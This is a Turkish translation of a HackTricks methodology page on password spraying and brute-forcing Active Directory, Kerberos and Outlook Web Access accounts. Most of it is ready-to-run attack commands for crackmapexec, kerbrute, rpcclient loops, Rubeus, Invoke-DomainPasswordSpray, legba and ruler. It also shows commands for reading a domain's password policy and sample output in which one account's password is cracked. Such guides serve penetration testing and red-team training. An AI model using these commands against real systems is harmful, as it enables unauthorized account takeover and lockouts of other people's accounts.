hacktricks/windows-hardening/active-directory-methodology/password-spraying.md
2024-02-10 18:14:16 +00:00

8.3 KiB
Raw Blame History

Parola Spreyi / Kaba Kuvvet

AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'i desteklemenin diğer yolları:

Parola Spreyi

Birkaç geçerli kullanıcı adı bulduktan sonra, keşfedilen her bir kullanıcı için en sık kullanılan parolaları deneyebilirsiniz (ortamın parola politikasını göz önünde bulundurun).
Varsayılan olarak, parola uzunluğu minimum 7'dir.

Ortak kullanıcı adları listeleri de faydalı olabilir: https://github.com/insidetrust/statistically-likely-usernames

Dikkat edin, birkaç yanlış parola denemek (varsayılan olarak 10'dan fazla) bazı hesapları kilitliyor olabilirsiniz.

Parola politikasını al

Eğer bazı kullanıcı kimlik bilgileriniz veya bir etki alanı kullanıcısı olarak bir kabuğunuz varsa, parola politikasını alabilirsiniz:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Linux (veya tümü) üzerinden Sömürü

  • crackmapexec kullanarak:
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
  • spray (kilitlenmeleri önlemek için deneme sayısını belirtebilirsiniz):
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
  • kerbrute kullanarak (python) - SOMETIMES ÇALIŞMADIĞI İÇİN TAVSİYE EDİLMEZ
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
  • Metasploit'in scanner/smb/smb_login modülü ile:

  • rpcclient kullanarak:
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Windows'tan

  • Rubeus ile brute modülüne sahip bir versiyonla:
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
  • Invoke-DomainPasswordSpray ile (Varsayılan olarak etki alanından kullanıcılar oluşturabilir ve şifre politikasını etki alanından alarak deneme sayısını buna göre sınırlayabilirsiniz):
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
Invoke-SprayEmptyPassword

Brute Force (Kaba Kuvvet)

{% code overflow="wrap" %}

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

{% endcode %}

Outlook Web Access

Outlook için password spraying için birden fazla araç bulunmaktadır.

Bu araçlardan herhangi birini kullanmak için, bir kullanıcı listesi ve püskürtmek için bir şifre / küçük bir şifre listesi gerekmektedir.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

Okta

Referanslar

AWS hackleme becerilerinizi sıfırdan kahraman seviyesine getirin htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile!

HackTricks'ı desteklemenin diğer yolları: